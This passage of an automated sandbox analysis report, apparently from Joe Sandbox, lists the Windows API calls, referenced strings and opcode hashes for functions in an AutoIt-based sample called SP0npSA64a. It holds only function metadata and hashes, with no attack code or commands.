                                                                                  • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                  • String ID: AU3_FreeVar
                                                                                  • API String ID: 2634073740-771828931
                                                                                  • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                  • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                  APIs
                                                                                  • CoInitialize.OLE32 ref: 0046C63A
                                                                                  • CoUninitialize.OLE32 ref: 0046C645
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                    • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                    • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                  • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                  • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                  • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                  • API String ID: 2294789929-1287834457
                                                                                  • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                  • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                  • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                  • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                  APIs
                                                                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                  • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                  • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                  • ReleaseCapture.USER32 ref: 0047116F
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                  • API String ID: 2483343779-2107944366
                                                                                  • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                  • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                  • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                  • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                  • _wcslen.LIBCMT ref: 00450720
                                                                                  • _wcscat.LIBCMT ref: 00450733
                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                  • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window_wcscat_wcslen
                                                                                  • String ID: -----$SysListView32
                                                                                  • API String ID: 4008455318-3975388722
                                                                                  • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                  • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                  • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                  • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                  APIs
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                  • GetParent.USER32 ref: 00469C98
                                                                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                  • GetParent.USER32 ref: 00469CBC
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 2360848162-1403004172
                                                                                  • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                  • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                  • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                  • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                  • String ID:
                                                                                  • API String ID: 262282135-0
                                                                                  • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                  • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                  • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                  • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 312131281-0
                                                                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                  APIs
                                                                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                  • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                                  • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                  • String ID:
                                                                                  • API String ID: 3771399671-0
                                                                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                  • String ID:
                                                                                  • API String ID: 2156557900-0
                                                                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                  • API String ID: 0-1603158881
                                                                                  • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                  • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                  • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                  • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                  APIs
                                                                                  • CreateMenu.USER32 ref: 00448603
                                                                                  • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                  • IsMenu.USER32(?), ref: 004486AB
                                                                                  • CreatePopupMenu.USER32 ref: 004486B5
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                  • DrawMenuBar.USER32 ref: 004486F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                  • String ID: 0
                                                                                  • API String ID: 161812096-4108050209
                                                                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 512da04ca80a1748b3b20bac416b7599ed1dbbcf22d4fa2522fd0b3d7f52bfc2
                                                                                  • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                  • Opcode Fuzzy Hash: 512da04ca80a1748b3b20bac416b7599ed1dbbcf22d4fa2522fd0b3d7f52bfc2
                                                                                  • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                  • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                  • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                  • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                  APIs
                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
